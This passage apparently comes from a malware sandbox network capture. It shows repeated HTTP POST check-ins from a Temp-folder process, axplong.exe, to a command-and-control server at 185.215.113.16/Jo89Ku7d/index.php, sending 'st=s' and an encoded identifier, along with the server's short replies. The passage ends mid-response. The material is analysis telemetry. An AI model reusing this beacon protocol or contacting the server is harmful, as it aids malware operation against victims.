                    Sep 27, 2024 05:53:48.073731899 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:48.074771881 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:48.302282095 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    38192.168.2.449775185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:48.420288086 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:49.145576000 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:49.146476030 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:49.380089998 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    39192.168.2.449776185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:49.497844934 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:50.192226887 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:50.193185091 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:50.417301893 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    40192.168.2.449777185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:50.528563023 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:51.246942043 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:51.247836113 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:51.484076023 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    41192.168.2.449778185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:51.609266996 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:52.306741953 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:52.309577942 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:52.531891108 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    42192.168.2.449779185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:52.664674997 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:53.420773983 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:53.424024105 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:53.652820110 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    43192.168.2.449780185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:53.767739058 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:54.474590063 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:54.475605965 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:54.705512047 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    44192.168.2.449781185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:54.825118065 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:55.606492043 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:55.612616062 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:55.839680910 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    45192.168.2.449782185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:55.951061964 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:56.689721107 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:56.691394091 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:56.919759989 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    46192.168.2.449783185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:57.028491974 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:57.774950981 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:57.776555061 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:58.055594921 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    47192.168.2.449784185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:58.173161983 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:58.883552074 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:58.884490967 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:59.114876986 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    48192.168.2.449785185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:59.231558084 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:59.949204922 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:59.949990034 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:54:00.181067944 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:54:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    49192.168.2.449786185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:54:00.294809103 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:54:00.987931967 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:54:00 GMT
                    Content-Type: text/html; charset=UTF-8
